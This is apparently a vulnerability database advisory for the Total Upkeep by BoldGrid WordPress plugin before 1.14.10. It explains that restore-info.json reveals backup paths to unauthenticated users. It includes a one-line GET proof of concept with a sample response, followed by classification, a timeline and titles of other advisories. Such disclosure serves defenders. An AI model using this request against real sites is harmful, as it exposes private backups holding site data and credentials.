Total Upkeep by BoldGrid < 1.14.10 – Unauthenticated Backup Download | Plugin Vulnerabilities

Description

The plugin does not restrict access to a file containing sensitive information, such as the internal path of backups, which may then allow unauthenticated users to download them.

Proof of Concept

The filepath in /wp-content/plugins/boldgrid-backup/cron/restore-info.json will reveal the internal path of the backup file, which might be publicly accessible.

GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json

{
    [...]
    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
    [...]
}

Affects Plugins

boldgrid-backup

Fixed in 1.14.10

References

Exploitdb

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Wadeek

Verified

Yes

WPVDB ID

d35c19d9-8586-4c5b-9a01-44739cbeee19

Timeline

Publicly Published

2020-12-14 (about 5 years ago)

Added

2020-12-14 (about 5 years ago)

Last Updated

2020-12-15 (about 5 years ago)

Other

Published

Title

Published

2022-06-27

Title

miniOrange's Google Authenticator < 5.5.75 - Reflected Cross-Site Scripting

Published

2021-01-28

Title

uListing < 1.7 - Unauthenticated Arbitrary Post/Page Deletion

Published

2021-07-19

Title

RestroPress < 2.8.3.1 - Unauthorised AJAX Calls

Published

2023-07-17

Title

Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending

Published

2021-04-15

Title

User Rights Access Manager < 1.0.4 - Improper Access Controls